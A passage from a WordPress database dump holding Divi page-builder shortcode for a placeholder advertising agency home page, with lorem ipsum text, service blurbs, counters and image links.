button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-02 21:29:01','2020-07-02 21:29:01','',134,'https://52.66.212.87/2020/07/02/134-revision-v1/',0,'revision','',0),(170,1,'2020-07-02 21:30:17','2020-07-02 21:30:17','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"28px||78px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" title_text=\"Desktop HD\" custom_margin=\"|auto|1px|auto||\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.4.9\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"60px\" header_line_height=\"1.3em\" custom_margin=\"50px||40px|||\" animation_style=\"zoom\" hover_enabled=\"0\" header_font_size_last_edited=\"off|desktop\" locked=\"off\" text_text_shadow_style=\"preset1\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\" box_shadow_style=\"preset2\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#fcd21d\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" 